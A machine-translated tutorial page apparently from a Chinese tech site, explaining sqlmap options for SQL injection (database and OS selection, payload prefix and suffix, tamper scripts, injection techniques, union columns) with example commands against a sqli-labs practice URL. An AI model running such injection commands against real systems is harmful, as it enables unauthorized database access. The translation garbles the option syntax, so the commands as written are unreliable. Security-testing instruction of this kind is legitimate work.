In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-09-23 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)06/01 Report--
This article will explain in detail how to parse the sqlmap injection parameters, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.
1. Specify the database type-dbms
Http://192.168.1.121/sqli/Less-1/?id=1&&name=2-dbms mysql-dbs
2. Specify the operating system-- os
Http://192.168.1.121/sqli/Less-1/?id=1&&name=2-os windows-dbs
Third, solve the coding problem
Convert all results to strings and replace NULL results-- no-cast-- with spaces
Fourth, turn off the string escape mechanism
-- no-escape
Fifth, set invalid value replacement
-- invalid-bignum large integer substitution
-- invalid-logical Boolean operation replacement
-- invalid-string random string substitution
6. Custom injection load location
-- prefix sets the prefix
-- suffix sets the suffix
Sqlmap-u "http://192.168.1.121/sqli/Less-1/?id=1"-- prefix="')-- suffix= "and ('abc'='abc"-- dbs
Payload:id= ('1') and ('abc'='abc')
7. Set up tamper script
Sqlmap-u "http://192.168.1.121/sqli/Less-1/?id=1"-- tamper" least.py,varnish.py "--dbs
8. Set dbms authentication
Sqlmap-u "http://192.168.1.121/sqli/Less-1/?id=1"-- dbms-cred=" root:root "--dbs
9. Set up specific sql injection technology
-- technique B Boolean blind injection
-- technique E error injection
-- technique U union query injection
-- technique S stack injection
-- technique T time blind injection
-- technique Q inline query injection
Sqlmap-u "http://192.168.1.121/sqli/Less-1/?id=1"-technique T-time-sec 3-dbs
-- time-sec time blind injection time is 3
Specify the number of union fields
Sqlmap-u "http://192.168.1.121/sqli/Less-1/?id=1"-- union-cols 12-18-- dbs
Specify union character. Default is null.
Sqlmap-u "http://192.168.1.121/sqli/Less-1/?id=1"-- union-char aaa-- dbs
On how to parse the sqlmap injection parameters to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
The market share of Chrome browser on the desktop has exceeded 70%, and users are complaining about
The world's first 2nm mobile chip: Samsung Exynos 2600 is ready for mass production.According to a r
A US federal judge has ruled that Google can keep its Chrome browser, but it will be prohibited from
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
About us Contact us Product review car news thenatureplanet
More Form oMedia: AutoTimes. Bestcoffee. SL News. Jarebook. Coffee Hunters. Sundaily. Modezone. NNB. Coffee. Game News. FrontStreet. GGAMEN
© 2024 shulou.com SLNews company. All rights reserved.
12
Report
